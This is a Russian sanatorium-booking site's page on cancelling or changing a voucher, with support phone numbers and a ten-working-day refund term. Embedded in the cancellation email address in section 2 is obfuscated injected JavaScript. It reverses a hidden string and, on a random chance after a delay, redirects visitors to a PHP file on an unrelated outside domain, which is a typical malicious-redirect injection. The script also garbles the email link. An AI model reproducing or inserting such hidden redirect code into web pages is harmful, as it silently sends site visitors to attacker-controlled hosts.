Отказ от брони/путевки

Отказ от бронирования

1.Совершая бронирование путевки, вы принимаете и соглашаетесь с порядком и условиями отмены заказа.

В случае необходимости изменения вами оформленного бронирования, вам необходимо связаться со службой поддержки клиентов по телефону 8 800 77 55 084 или +7 (3822) 522-474, при этом при переносе сроков  Компания не гарантирует такую же цену, наличие мест в санаториях/пансионатах, тип номера для проживания и иные условия изменения бронирования. Таким образом, вы принимаете на себя все возможные риски (оформление изменения бронирования, изменение тарифа, возврат денежных средств за вычетом штрафов за отмену Бронирования и проч.), связанные с таким изменением или отменой бронирования.

2. В случае отмены бронирования вам необходимо связаться со службой поддержки клиентов по телефону 8 800 77 55 084 или +7 (3822) 522-474 или написать письмо об отмене бронирования на эл.почту $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to:bron8@yandex.ru»>bron8@yandex.ru , в этом случае возврат денежных средств будет перечислен в полном объеме

Денежные средства возвращаются в течение 10 (десяти) рабочих дней с даты отмены/аннулирования путевки. В силу специфики финансовых операций время между операцией возврата и реальным зачислением денег на счет клиента зависит от внутренних банковских процедур, за которые Компания не несет ответственности перед вами.